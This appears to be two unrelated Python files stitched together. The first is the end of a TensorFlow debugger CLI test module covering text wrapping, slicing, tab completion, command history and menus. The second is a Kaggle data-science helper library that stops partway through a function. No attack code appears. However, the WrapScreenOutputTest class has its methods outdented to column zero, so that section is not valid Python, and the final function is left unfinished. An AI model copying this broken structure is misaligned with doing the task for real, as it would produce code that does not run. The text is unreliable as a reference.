                     searched.font_attr_segs)
class WrapScreenOutputTest(test_util.TensorFlowTestCase):
def setUp(self):
  """Build a three-line fixture with font attributes and annotations."""
  lines = ["Folk song:", "Roses are red", "Violets are blue"]
  attr_segs = {
      1: [(0, 5, "red"), (6, 9, "gray"), (10, 12, "red"), (12, 13, "crimson")],
      2: [(0, 7, "blue"), (8, 11, "gray"), (12, 14, "blue"), (14, 16, "indigo")],
  }
  notes = {1: "longer wavelength", 2: "shorter wavelength"}
  self._orig_screen_output = debugger_cli_common.RichTextLines(
      lines, font_attr_segs=attr_segs, annotations=notes)
def testNoActualWrapping(self):
  """A column limit wider than every line must leave the output unchanged."""
  wrapped, row_indices = debugger_cli_common.wrap_rich_text_lines(
      self._orig_screen_output, 100)

  self.assertEqual(self._orig_screen_output.lines, wrapped.lines)
  self.assertEqual(self._orig_screen_output.font_attr_segs,
                   wrapped.font_attr_segs)
  self.assertEqual(self._orig_screen_output.annotations, wrapped.annotations)
  # Each original row maps to itself when nothing wraps.
  self.assertEqual(row_indices, [0, 1, 2])
def testWrappingWithAttrCutoff(self):
  """Wrapping at 11 columns must split attribute segments at wrap points."""
  out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
      self._orig_screen_output, 11)

  # Add non-row-index field to out.
  out.annotations["metadata"] = "foo"

  # Check wrapped text.
  self.assertEqual(5, len(out.lines))
  self.assertEqual("Folk song:", out.lines[0])
  self.assertEqual("Roses are r", out.lines[1])
  self.assertEqual("ed", out.lines[2])
  self.assertEqual("Violets are", out.lines[3])
  self.assertEqual(" blue", out.lines[4])

  # Check wrapped font_attr_segs: segments crossing a wrap boundary are
  # truncated on the first row and continued (re-based) on the next.
  self.assertFalse(0 in out.font_attr_segs)
  self.assertEqual([(0, 5, "red"), (6, 9, "gray"), (10, 11, "red")],
                   out.font_attr_segs[1])
  self.assertEqual([(0, 1, "red"), (1, 2, "crimson")], out.font_attr_segs[2])
  self.assertEqual([(0, 7, "blue"), (8, 11, "gray")], out.font_attr_segs[3])
  self.assertEqual([(1, 3, "blue"), (3, 5, "indigo")], out.font_attr_segs[4])

  # Check annotations: they stay attached to the first wrapped row only.
  self.assertFalse(0 in out.annotations)
  self.assertEqual("longer wavelength", out.annotations[1])
  self.assertFalse(2 in out.annotations)
  self.assertEqual("shorter wavelength", out.annotations[3])
  self.assertFalse(4 in out.annotations)

  # Check that the non-row-index field is present in output.
  self.assertEqual("foo", out.annotations["metadata"])

  self.assertEqual(new_line_indices, [0, 1, 3])
def testWrappingWithMultipleAttrCutoff(self):
  """A single attribute segment spanning several wrap boundaries must be
  split across every wrapped row it covers."""
  self._orig_screen_output = debugger_cli_common.RichTextLines(
      ["Folk song:", "Roses are red", "Violets are blue"],
      font_attr_segs={1: [(0, 12, "red")],
                      2: [(1, 16, "blue")]},
      annotations={1: "longer wavelength",
                   2: "shorter wavelength"})
  out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
      self._orig_screen_output, 5)
  # Check wrapped text.
  self.assertEqual(9, len(out.lines))
  self.assertEqual("Folk ", out.lines[0])
  self.assertEqual("song:", out.lines[1])
  self.assertEqual("Roses", out.lines[2])
  self.assertEqual(" are ", out.lines[3])
  self.assertEqual("red", out.lines[4])
  self.assertEqual("Viole", out.lines[5])
  self.assertEqual("ts ar", out.lines[6])
  self.assertEqual("e blu", out.lines[7])
  self.assertEqual("e", out.lines[8])
  # Check wrapped font_attr_segs.
  self.assertFalse(0 in out.font_attr_segs)
  self.assertFalse(1 in out.font_attr_segs)
  self.assertEqual([(0, 5, "red")], out.font_attr_segs[2])
  self.assertEqual([(0, 5, "red")], out.font_attr_segs[3])
  self.assertEqual([(0, 2, "red")], out.font_attr_segs[4])
  self.assertEqual([(1, 5, "blue")], out.font_attr_segs[5])
  self.assertEqual([(0, 5, "blue")], out.font_attr_segs[6])
  self.assertEqual([(0, 5, "blue")], out.font_attr_segs[7])
  self.assertEqual([(0, 1, "blue")], out.font_attr_segs[8])
  # Check annotations: only the first wrapped row of each original line
  # keeps the annotation.
  self.assertFalse(0 in out.annotations)
  self.assertFalse(1 in out.annotations)
  self.assertEqual("longer wavelength", out.annotations[2])
  self.assertFalse(3 in out.annotations)
  self.assertFalse(4 in out.annotations)
  self.assertEqual("shorter wavelength", out.annotations[5])
  self.assertFalse(6 in out.annotations)
  self.assertFalse(7 in out.annotations)
  self.assertFalse(8 in out.annotations)
  self.assertEqual(new_line_indices, [0, 2, 5])
def testWrappingInvalidArguments(self):
  """Invalid argument types should be rejected with descriptive errors."""
  bad_screen_output = "foo"
  with self.assertRaisesRegexp(ValueError,
                               "Invalid type of input screen_output"):
    debugger_cli_common.wrap_rich_text_lines(bad_screen_output, 12)
  valid_screen_output = debugger_cli_common.RichTextLines(["foo", "bar"])
  with self.assertRaisesRegexp(ValueError, "Invalid type of input cols"):
    debugger_cli_common.wrap_rich_text_lines(valid_screen_output, "12")
def testWrappingEmptyInput(self):
  """Wrapping an empty RichTextLines yields empty lines and indices."""
  empty_output = debugger_cli_common.RichTextLines([])
  out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
      empty_output, 10)
  self.assertEqual(out.lines, [])
  self.assertEqual(new_line_indices, [])
class SliceRichTextLinesTest(test_util.TensorFlowTestCase):
  """Tests for RichTextLines.slice(): row selection, re-based indices in
  font_attr_segs/annotations, and preservation of non-row metadata."""

  def setUp(self):
    self._original = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]},
        annotations={
            0: "longer wavelength",
            1: "shorter wavelength",
            "foo_metadata": "bar"
        })

  def testSliceBeginning(self):
    sliced = self._original.slice(0, 1)
    self.assertEqual(["Roses are red"], sliced.lines)
    self.assertEqual({0: [(0, 5, "red")]}, sliced.font_attr_segs)
    # Non-line-number metadata should be preserved.
    self.assertEqual({
        0: "longer wavelength",
        "foo_metadata": "bar"
    }, sliced.annotations)
    self.assertEqual(1, sliced.num_lines())

  def testSliceEnd(self):
    sliced = self._original.slice(1, 2)
    self.assertEqual(["Violets are blue"], sliced.lines)
    # The line index should have changed from 1 to 0.
    self.assertEqual({0: [(0, 7, "blue")]}, sliced.font_attr_segs)
    self.assertEqual({
        0: "shorter wavelength",
        "foo_metadata": "bar"
    }, sliced.annotations)
    self.assertEqual(1, sliced.num_lines())

  def testAttemptSliceWithNegativeIndex(self):
    # Negative indices are rejected rather than interpreted Python-style.
    with self.assertRaisesRegexp(ValueError, "Encountered negative index"):
      self._original.slice(0, -1)
class TabCompletionRegistryTest(test_util.TensorFlowTestCase):
  """Tests for TabCompletionRegistry: registration, prefix lookup,
  extension/removal of completion items, and context deregistration."""

  def setUp(self):
    self._tc_reg = debugger_cli_common.TabCompletionRegistry()
    # Register the items in an unsorted order deliberately, to test the sorted
    # output from get_completions().
    self._tc_reg.register_tab_comp_context(
        ["print_tensor", "pt"],
        ["node_b:1", "node_b:2", "node_a:1", "node_a:2"])
    self._tc_reg.register_tab_comp_context(["node_info"],
                                           ["node_c", "node_b", "node_a"])

  def testTabCompletion(self):
    # The returned completions should have sorted order.
    self.assertEqual(
        (["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
        self._tc_reg.get_completions("print_tensor", "node_"))
    self.assertEqual((["node_a:1", "node_a:2", "node_b:1", "node_b:2"],
                      "node_"), self._tc_reg.get_completions("pt", ""))
    self.assertEqual((["node_a:1", "node_a:2"], "node_a:"),
                     self._tc_reg.get_completions("print_tensor", "node_a"))
    self.assertEqual((["node_a:1"], "node_a:1"),
                     self._tc_reg.get_completions("pt", "node_a:1"))
    self.assertEqual(([], ""),
                     self._tc_reg.get_completions("print_tensor", "node_a:3"))
    # An unregistered context word yields (None, None).
    self.assertEqual((None, None), self._tc_reg.get_completions("foo", "node_"))

  def testExtendCompletionItems(self):
    self.assertEqual(
        (["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
        self._tc_reg.get_completions("print_tensor", "node_"))
    self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
                     self._tc_reg.get_completions("node_info", "node_"))
    self._tc_reg.extend_comp_items("print_tensor", ["node_A:1", "node_A:2"])
    self.assertEqual((["node_A:1", "node_A:2", "node_a:1", "node_a:2",
                       "node_b:1", "node_b:2"], "node_"),
                     self._tc_reg.get_completions("print_tensor", "node_"))
    # Extending the completions for one of the context's context words should
    # have taken effect on other context words of the same context as well.
    self.assertEqual((["node_A:1", "node_A:2", "node_a:1", "node_a:2",
                       "node_b:1", "node_b:2"], "node_"),
                     self._tc_reg.get_completions("pt", "node_"))
    self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
                     self._tc_reg.get_completions("node_info", "node_"))

  def testExtendCompletionItemsNonexistentContext(self):
    with self.assertRaisesRegexp(
        KeyError, "Context word \"foo\" has not been registered"):
      self._tc_reg.extend_comp_items("foo", ["node_A:1", "node_A:2"])

  def testRemoveCompletionItems(self):
    self.assertEqual(
        (["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
        self._tc_reg.get_completions("print_tensor", "node_"))
    self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
                     self._tc_reg.get_completions("node_info", "node_"))
    # Removal through one context word affects the whole shared context.
    self._tc_reg.remove_comp_items("pt", ["node_a:1", "node_a:2"])
    self.assertEqual((["node_b:1", "node_b:2"], "node_b:"),
                     self._tc_reg.get_completions("print_tensor", "node_"))
    self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
                     self._tc_reg.get_completions("node_info", "node_"))

  def testRemoveCompletionItemsNonexistentContext(self):
    with self.assertRaisesRegexp(
        KeyError, "Context word \"foo\" has not been registered"):
      self._tc_reg.remove_comp_items("foo", ["node_a:1", "node_a:2"])

  def testDeregisterContext(self):
    self.assertEqual(
        (["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
        self._tc_reg.get_completions("print_tensor", "node_"))
    self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
                     self._tc_reg.get_completions("node_info", "node_"))
    self._tc_reg.deregister_context(["print_tensor"])
    self.assertEqual((None, None),
                     self._tc_reg.get_completions("print_tensor", "node_"))
    # The alternative context word should be unaffected.
    self.assertEqual(
        (["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
        self._tc_reg.get_completions("pt", "node_"))

  def testDeregisterNonexistentContext(self):
    self.assertEqual(
        (["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
        self._tc_reg.get_completions("print_tensor", "node_"))
    self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
                     self._tc_reg.get_completions("node_info", "node_"))
    self._tc_reg.deregister_context(["print_tensor"])
    with self.assertRaisesRegexp(
        KeyError,
        "Cannot deregister unregistered context word \"print_tensor\""):
      self._tc_reg.deregister_context(["print_tensor"])
class CommandHistoryTest(test_util.TensorFlowTestCase):
  """Tests for CommandHistory: in-memory recall (with a size limit),
  prefix lookup, deduplication, and persistence to a history file,
  including graceful handling of unreadable/unwritable files."""

  def setUp(self):
    self._history_file_path = tempfile.mktemp()
    self._cmd_hist = debugger_cli_common.CommandHistory(
        limit=3, history_file_path=self._history_file_path)

  def tearDown(self):
    if os.path.isfile(self._history_file_path):
      os.remove(self._history_file_path)

  def _restoreFileReadWritePermissions(self, file_path):
    # Restore read+write for user/group/other so tearDown can delete the file
    # after tests that deliberately drop permissions.
    os.chmod(file_path,
             (stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR |
              stat.S_IWGRP | stat.S_IWOTH))

  def testLookUpMostRecent(self):
    self.assertEqual([], self._cmd_hist.most_recent_n(3))
    self._cmd_hist.add_command("list_tensors")
    self._cmd_hist.add_command("node_info node_a")
    self.assertEqual(["node_info node_a"], self._cmd_hist.most_recent_n(1))
    self.assertEqual(["list_tensors", "node_info node_a"],
                     self._cmd_hist.most_recent_n(2))
    self.assertEqual(["list_tensors", "node_info node_a"],
                     self._cmd_hist.most_recent_n(3))
    self._cmd_hist.add_command("node_info node_b")
    self.assertEqual(["node_info node_b"], self._cmd_hist.most_recent_n(1))
    self.assertEqual(["node_info node_a", "node_info node_b"],
                     self._cmd_hist.most_recent_n(2))
    self.assertEqual(["list_tensors", "node_info node_a", "node_info node_b"],
                     self._cmd_hist.most_recent_n(3))
    self.assertEqual(["list_tensors", "node_info node_a", "node_info node_b"],
                     self._cmd_hist.most_recent_n(4))
    # Go over the limit.
    self._cmd_hist.add_command("node_info node_a")
    self.assertEqual(["node_info node_a"], self._cmd_hist.most_recent_n(1))
    self.assertEqual(["node_info node_b", "node_info node_a"],
                     self._cmd_hist.most_recent_n(2))
    self.assertEqual(
        ["node_info node_a", "node_info node_b", "node_info node_a"],
        self._cmd_hist.most_recent_n(3))
    self.assertEqual(
        ["node_info node_a", "node_info node_b", "node_info node_a"],
        self._cmd_hist.most_recent_n(4))

  def testLookUpPrefix(self):
    self._cmd_hist.add_command("node_info node_b")
    self._cmd_hist.add_command("list_tensors")
    self._cmd_hist.add_command("node_info node_a")
    self.assertEqual(["node_info node_b", "node_info node_a"],
                     self._cmd_hist.lookup_prefix("node_info", 10))
    self.assertEqual(["node_info node_a"], self._cmd_hist.lookup_prefix(
        "node_info", 1))
    self.assertEqual([], self._cmd_hist.lookup_prefix("print_tensor", 10))

  def testAddNonStrCommand(self):
    with self.assertRaisesRegexp(
        TypeError, "Attempt to enter non-str entry to command history"):
      self._cmd_hist.add_command(["print_tensor node_a:0"])

  def testRepeatingCommandsDoNotGetLoggedRepeatedly(self):
    self._cmd_hist.add_command("help")
    self._cmd_hist.add_command("help")
    self.assertEqual(["help"], self._cmd_hist.most_recent_n(2))

  def testCommandHistoryFileIsCreated(self):
    self.assertFalse(os.path.isfile(self._history_file_path))
    self._cmd_hist.add_command("help")
    self.assertTrue(os.path.isfile(self._history_file_path))
    with open(self._history_file_path, "rt") as f:
      self.assertEqual(["help\n"], f.readlines())

  def testLoadingCommandHistoryFileObeysLimit(self):
    self._cmd_hist.add_command("help 1")
    self._cmd_hist.add_command("help 2")
    self._cmd_hist.add_command("help 3")
    self._cmd_hist.add_command("help 4")
    # A fresh instance reading the same file keeps only the newest `limit`
    # entries, both in memory and on disk.
    cmd_hist_2 = debugger_cli_common.CommandHistory(
        limit=3, history_file_path=self._history_file_path)
    self.assertEqual(["help 2", "help 3", "help 4"],
                     cmd_hist_2.most_recent_n(3))
    with open(self._history_file_path, "rt") as f:
      self.assertEqual(
          ["help 2\n", "help 3\n", "help 4\n"], f.readlines())

  def testCommandHistoryHandlesReadingIOErrorGraciously(self):
    with open(self._history_file_path, "wt") as f:
      f.write("help\n")
    # Change file to not readable by anyone.
    os.chmod(self._history_file_path, 0)
    # The creation of a CommandHistory object should not error out.
    debugger_cli_common.CommandHistory(
        limit=3, history_file_path=self._history_file_path)
    self._restoreFileReadWritePermissions(self._history_file_path)

  def testCommandHistoryHandlesWritingIOErrorGraciously(self):
    with open(self._history_file_path, "wt") as f:
      f.write("help\n")
    # Change file to read-only.
    os.chmod(self._history_file_path,
             stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
    # Reading from the file should still work.
    cmd_hist_2 = debugger_cli_common.CommandHistory(
        limit=3, history_file_path=self._history_file_path)
    self.assertEqual(["help"], cmd_hist_2.most_recent_n(1))
    # Writing should no longer work, but it should fail silently and
    # the within instance-command history should still work.
    cmd_hist_2.add_command("foo")
    self.assertEqual(["help", "foo"], cmd_hist_2.most_recent_n(2))
    cmd_hist_3 = debugger_cli_common.CommandHistory(
        limit=3, history_file_path=self._history_file_path)
    self.assertEqual(["help"], cmd_hist_3.most_recent_n(1))
    self._restoreFileReadWritePermissions(self._history_file_path)
class MenuNodeTest(test_util.TensorFlowTestCase):
  """Unit tests for debugger_cli_common.MenuItem."""

  def testCommandTypeConstructorSucceeds(self):
    node = debugger_cli_common.MenuItem("water flower", "water_flower")
    self.assertEqual("water flower", node.caption)
    self.assertEqual("water_flower", node.content)

  def testDisableWorks(self):
    node = debugger_cli_common.MenuItem("water flower", "water_flower")
    # Items start out enabled; disable()/enable() toggle the state.
    self.assertTrue(node.is_enabled())
    node.disable()
    self.assertFalse(node.is_enabled())
    node.enable()
    self.assertTrue(node.is_enabled())

  def testConstructAsDisabledWorks(self):
    node = debugger_cli_common.MenuItem(
        "water flower", "water_flower", enabled=False)
    self.assertFalse(node.is_enabled())
    node.enable()
    self.assertTrue(node.is_enabled())
class MenuTest(test_util.TensorFlowTestCase):
  """Tests for Menu: item bookkeeping, single-line formatting with
  enabled/disabled attribute handling, and insertion order."""

  def setUp(self):
    self.menu = debugger_cli_common.Menu()
    self.assertEqual(0, self.menu.num_items())
    self.node1 = debugger_cli_common.MenuItem("water flower", "water_flower")
    self.node2 = debugger_cli_common.MenuItem(
        "measure wavelength", "measure_wavelength")
    self.menu.append(self.node1)
    self.menu.append(self.node2)
    self.assertEqual(2, self.menu.num_items())

  def testFormatAsSingleLineWithStrItemAttrsWorks(self):
    output = self.menu.format_as_single_line(
        prefix="Menu: ", divider=", ", enabled_item_attrs="underline")
    self.assertEqual(["Menu: water flower, measure wavelength, "], output.lines)
    # Each enabled item's segment carries the MenuItem followed by the attrs.
    self.assertEqual((6, 18, [self.node1, "underline"]),
                     output.font_attr_segs[0][0])
    self.assertEqual((20, 38, [self.node2, "underline"]),
                     output.font_attr_segs[0][1])
    self.assertEqual({}, output.annotations)

  def testFormatAsSingleLineWithListItemAttrsWorks(self):
    output = self.menu.format_as_single_line(
        prefix="Menu: ", divider=", ", enabled_item_attrs=["underline", "bold"])
    self.assertEqual(["Menu: water flower, measure wavelength, "], output.lines)
    self.assertEqual((6, 18, [self.node1, "underline", "bold"]),
                     output.font_attr_segs[0][0])
    self.assertEqual((20, 38, [self.node2, "underline", "bold"]),
                     output.font_attr_segs[0][1])
    self.assertEqual({}, output.annotations)

  def testFormatAsSingleLineWithNoneItemAttrsWorks(self):
    output = self.menu.format_as_single_line(prefix="Menu: ", divider=", ")
    self.assertEqual(["Menu: water flower, measure wavelength, "], output.lines)
    self.assertEqual((6, 18, [self.node1]), output.font_attr_segs[0][0])
    self.assertEqual((20, 38, [self.node2]), output.font_attr_segs[0][1])
    self.assertEqual({}, output.annotations)

  def testInsertNode(self):
    self.assertEqual(["water flower", "measure wavelength"],
                     self.menu.captions())
    node2 = debugger_cli_common.MenuItem("write poem", "write_poem")
    self.menu.insert(1, node2)
    self.assertEqual(["water flower", "write poem", "measure wavelength"],
                     self.menu.captions())
    output = self.menu.format_as_single_line(prefix="Menu: ", divider=", ")
    self.assertEqual(["Menu: water flower, write poem, measure wavelength, "],
                     output.lines)

  def testFormatAsSingleLineWithDisabledNode(self):
    node2 = debugger_cli_common.MenuItem(
        "write poem", "write_poem", enabled=False)
    self.menu.append(node2)
    output = self.menu.format_as_single_line(
        prefix="Menu: ", divider=", ", disabled_item_attrs="bold")
    self.assertEqual(["Menu: water flower, measure wavelength, write poem, "],
                     output.lines)
    self.assertEqual((6, 18, [self.node1]), output.font_attr_segs[0][0])
    self.assertEqual((20, 38, [self.node2]), output.font_attr_segs[0][1])
    # Disabled items get only the disabled attrs, not a MenuItem reference.
    self.assertEqual((40, 50, ["bold"]), output.font_attr_segs[0][2])
class GetTensorFlowVersionLinesTest(test_util.TensorFlowTestCase):
  """Tests for debugger_cli_common.get_tensorflow_version_lines()."""

  def testGetVersionWithoutDependencies(self):
    version_lines = debugger_cli_common.get_tensorflow_version_lines()
    self.assertEqual(2, len(version_lines.lines))
    self.assertEqual(
        "TensorFlow version: %s" % pywrap_tf_session.__version__,
        version_lines.lines[0])

  def testGetVersionWithDependencies(self):
    version_lines = debugger_cli_common.get_tensorflow_version_lines(True)
    self.assertIn(
        "TensorFlow version: %s" % pywrap_tf_session.__version__,
        version_lines.lines)
    self.assertIn("  numpy: %s" % np.__version__, version_lines.lines)
# Entry point: run all test cases in this module.
if __name__ == "__main__":
  googletest.main()
| |
"""An ML library to help with Kaggle problems.
"""
from itertools import chain, repeat
import logging
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import sklearn.base
logger = logging.getLogger(__name__)
class Regressor(sklearn.base.BaseEstimator):
    """Thin sklearn-style wrapper around a statsmodels-like estimator.

    Parameters
    ----------
    estimator : callable
        Factory of the form ``estimator(X, y)`` returning an object whose
        ``fit()`` method yields a fitted model exposing ``predict``
        (e.g. ``statsmodels.api.OLS``).
    """

    def __init__(self, estimator):
        self.estimator = estimator

    def fit(self, X, y):
        """Fit the wrapped estimator on (X, y) and return self.

        Returning ``self`` follows the scikit-learn estimator contract,
        so the wrapper composes with pipelines and chained calls
        (previously this method returned None).
        """
        self.model = self.estimator(X, y).fit()
        return self

    def predict(self, X):
        """Predict with the fitted model. Requires a prior call to fit()."""
        return self.model.predict(X)
class DataSet:
    """Helper class to manipulate the training and test datasets seamlessly.

    Deprecated: prefer
    ``pd.concat([raw_train, raw_test], keys=["train", "test"])``.

    Attributes
    ----------
    df : dataframe
        Full data containing both the training and test datasets.
    train: dataframe
        The training dataset, kept in sync with df.
    test: dataframe
        The test dataset, kept in sync with df.
    """

    def __init__(self, raw_train, raw_test):
        # Logger.warn() is deprecated in the logging module; warning() is the
        # documented spelling.
        logger.warning('DeprecationWarning: use `pd.concat([raw_train, raw_test], keys=["train", "test"])` '
                       'instead of this class')
        self.raw_train = raw_train
        self.raw_test = raw_test
        self.train = self.raw_train.copy()
        self.test = self.raw_test.copy()
        # Assigning df also refreshes self.train/self.test via the setter.
        self.df = self.merge(self.raw_train, self.raw_test)

    @staticmethod
    def merge(train, test):
        """Stack train on top of test into a single dataframe with a fresh index."""
        return pd.concat([train, test], axis=0, ignore_index=True)

    def split(self, alldf):
        """Split `alldf` back into (train, test), restoring the raw indices.

        Row order is assumed unchanged since merge(): the first
        len(self.train) rows are the training part.
        """
        n = self.train.shape[0]
        train = alldf.iloc[:n, :].set_index(self.raw_train.index)
        test = alldf.iloc[n:, :].set_index(self.raw_test.index)
        return train, test

    @property
    def df(self):
        """Full dataframe; setting it keeps train/test in sync."""
        return self._df

    @df.setter
    def df(self, dataframe):
        self._df = dataframe
        # Update the train and test datasets
        self.train, self.test = self.split(self._df)

    def copy(self):
        """Return a copy of the dataset."""
        ds = DataSet(self.train, self.test)
        ds.raw_train = self.raw_train
        ds.raw_test = self.raw_test
        return ds

    def apply(self, func, inplace=False):
        """Apply a function func: dataframe -> dataframe
        to the dataset and return the transformed dataset.
        Leave raw data unchanged.
        """
        df = func(self.df)
        if inplace:
            self.df = df
            return self
        else:
            ds = self.copy()
            ds.df = df
            return ds

    def __getattr__(self, attr):
        """Try to get the attribute from the class,
        otherwise try to get it from the underlying dataframe.
        """
        # NOTE: __getattr__ only runs after normal attribute lookup fails,
        # so the __dict__ branch below is a defensive no-op in practice.
        if attr in self.__dict__:
            return self.__dict__[attr]
        else:
            try:
                return self.df.__getattr__(attr)
            except AttributeError:
                print("Unable to find attribute {!r} in self nor in self.df".format(attr))
                raise
def fillna(df, wok, columns=None, **kwargs):
    """Apply callable parameter `wok` to fill the null values in `df`.

    Can be used in a pipe chain. This is unlike the default pandas
    dataframe `fillna` method that does not take a callable as a
    parameter nor a `columns` parameter. The `columns` argument allows
    one to apply the callable to only a subset of the input dataframe
    (while still returning a dataframe of the same shape as the
    original dataframe).

    Parameters
    ----------
    df: DataFrame (or Series)
        The object we want to fill the null values in.
    wok: callable or string
        Aggregate function, of the form df -> df' = foo(df), used to
        fill the null values. If it's a string, apply the method whose
        name is wok. Examples: np.nanmean, np.nanmedian, 'mean',
        'median'.
    columns: List[str], optional
        The list of columns to fill the null values in.
    kwargs: dict, optional
        Optional arguments passed to pd.fillna.

    Returns
    -------
    A dataframe having the same shape as df.

    Raises
    ------
    TypeError
        If `wok` is a string naming a method `df` does not have, or is
        neither callable nor a string.
    """
    if columns is not None:
        # Work on a copy so only the requested columns are filled and the
        # caller's dataframe is left untouched.
        df = df.copy()
        df.loc[:, columns] = fillna(df.loc[:, columns], wok, **kwargs)
        return df
    if callable(wok):
        return df.fillna(wok(df), **kwargs)
    if isinstance(wok, str):
        if hasattr(df, wok):
            return df.fillna(getattr(df, wok)(), **kwargs)
        # Bug fix: the message was never formatted — the format string and
        # its arguments were passed as separate TypeError args.
        raise TypeError('{!r} method not found in {!r}'.format(wok, df))
    # Bug fix: a non-callable, non-str `wok` previously fell through and
    # silently returned None.
    raise TypeError('wok must be a callable or a method name, got {!r}'.format(wok))
def has_nulls(df):
    """Return a truthy value when `df` (dataframe or series) contains any null."""
    null_counts = df.isnull().sum()
    return null_counts.any()
# Pipeline
# Create a pipeline so we can process all the data later in one go if needed
class Pipeline:
    """Accumulate dataframe-transforming functions and apply them in order.

    Functions appended to the pipeline are applied successively to the
    input dataframe when the pipeline is called. A function is only
    appended when it is not already the last step of the pipeline
    (matched by function name), so re-running a notebook cell several
    times keeps the pipeline roughly idempotent.
    """

    def __init__(self, df):
        self.input_df = df
        self._pipeline = []

    def append(self, func):
        """Append `func` unless it is already the final step."""
        tail_is_same = bool(self._pipeline) and self._same_func(
            self._pipeline[-1], func)
        if not tail_is_same:
            self._pipeline.append(func)

    def __call__(self):
        """Apply every step, in order, to the input dataframe."""
        result = self.input_df
        for step in self._pipeline:
            result = result.pipe(step)
        return result

    @staticmethod
    def _same_func(f1, f2):
        # Compare by name only: a function re-defined by re-executing a
        # notebook cell still counts as "the same" step.
        return f1.__name__ == f2.__name__

    def __str__(self):
        return str(self._pipeline)

    def __repr__(self):
        return repr(self._pipeline)

    def __eq__(self, dg):
        """Compare the `dg` dataframe with the pipeline output"""
        return all(self() == dg)
# Plotting functions
def violinplot(df, ax=None):
    """Draw a seaborn violin plot of `df` on `ax` (current axes when None),
    rotating the x tick labels by 30 degrees for readability."""
    if ax is None:
        ax = plt.gca()
    sns.violinplot(df, ax=ax)
    for xlab in ax.get_xticklabels():
        xlab.set_rotation(30)
## Visualisation
def featureplot(df, nrows=1, ncols=1, figsize=(12,8), plotfunc=sns.violinplot, **kwargs):
    """Plot the dataframe features.
    Use Matplotlib to plot individual features across columns.

    Each axis receives a contiguous slice of `df`'s columns; `plotfunc`
    is called once per axis with that slice as `data`.
    """
    logger.warning('DEPRECATED: use the more general `featureplots` instead')
    width, height = figsize
    # Figure height scales with the number of rows.
    fig, axes = plt.subplots(nrows, ncols, figsize=(width, height * nrows));
    i = 0
    # Number of dataframe columns drawn per axis (at least one).
    plots_per_figure = max(df.shape[1] // (nrows * ncols), 1)
    if nrows == 1 and ncols == 1:
        axes = [axes]
    if nrows > 1 and ncols > 1:
        axes = chain.from_iterable(axes) # flatten the nested list
    # NOTE(review): axes is only flattened when both nrows>1 and ncols>1;
    # a (n,1)/(1,n) subplot grid is already 1-D, so iteration still works.
    for j, ax in zip(range(plots_per_figure, df.shape[1] + 1, plots_per_figure), axes):
        plotfunc(data=df.iloc[:, i:j], ax=ax, **kwargs)
        i = j
    plt.tight_layout()
def reshape(arr, ncols=1, nrows=-1, force=True):
    """Reshape input data to the given (nrows, ncols) shape.

    If the data does not fit the requested shape and `force` is true, the
    flattened data is either truncated (too much data) or padded with
    zeros (not enough data) to match. If `force` is false, numpy's
    original ValueError is re-raised (previously this path silently
    returned None).

    Parameters
    ----------
    arr : array-like
        The data to reshape.
    ncols, nrows : int
        Target shape; -1 lets numpy (or the padding logic) infer the axis.
    force : bool, optional
        Whether to truncate/pad non-conforming data.

    Returns
    -------
    numpy.ndarray of shape (nrows, ncols).
    """
    arr = np.asarray(arr)
    try:
        return arr.reshape((nrows, ncols))
    except ValueError:
        if not force:
            raise
        if nrows == ncols == -1:
            raise ValueError('at least one of nrows/ncols must be non-negative')
        # Explicit float() keeps the ceil meaningful under Python 2's
        # integer division as well (matching the style used elsewhere here).
        if nrows == -1:
            nrows = int(np.ceil(arr.size / float(ncols)))
        if ncols == -1:
            ncols = int(np.ceil(arr.size / float(nrows)))
        size = nrows * ncols
        flat = arr.flatten()
        if size < flat.size:
            # Too much data: chop the trailing values.
            return flat[:size].reshape((nrows, ncols))
        elif size > flat.size:
            # Not enough data: pad with zeros. Assign from `flat`, not `arr`,
            # so multi-dimensional input does not break the broadcast.
            new = np.zeros(size, dtype=arr.dtype)
            new[:flat.size] = flat
            return new.reshape((nrows, ncols))
        else:
            raise
def tile_funcs(plotfuncs, nrows=1, ncols=1, axis=1):
    """Tile `plotfuncs` into a 2-D grid of callables (row-wise layout).

    With axis=1 the function list is repeated along each row; with axis=0
    it is stacked column-wise.

    Raises
    ------
    ValueError
        If `axis` is neither 0 nor 1 (previously this fell through to a
        NameError on the undefined `block`).
    """
    if axis == 1:
        block = np.array(plotfuncs)
    elif axis == 0:
        block = np.array(plotfuncs).reshape((-1, 1))
    else:
        raise ValueError('axis must be 0 or 1, got {!r}'.format(axis))
    row_block = np.hstack([block] * ncols)
    return np.vstack([row_block] * nrows)
def tile_features(features, nfuncs, nrows=-1, ncols=1, axis=1):
    """Tile feature names into a grid matching the layout of tile_funcs().

    Each feature is repeated `nfuncs` times so that every plotting
    function in the corresponding tile_funcs() grid receives its feature.
    Returns a 2-D array produced by the module-level reshape() helper.
    """
    def chunklist(features, nfuncs, ncols=None, axis=1):
        """Repeat each feature nfuncs times, ordered for the given axis."""
        if axis == 1:
            # Interleave: [a, a, b, b, ...] for nfuncs == 2.
            return list(chain(*zip(*repeat(features, nfuncs))))
        elif axis == 0:
            assert ncols is not None
            n = ncols
            # Pad the feature list up to a multiple of ncols, then repeat
            # each row of n features nfuncs times.
            size = int(np.ceil(len(features)/float(n))) * n
            lst = list(reshape(features, ncols=size).squeeze())
            res = []
            for i in range(0, len(lst), n):
                res.append(chain(*repeat(lst[i:i + n], nfuncs)))
            return list(chain(*res))
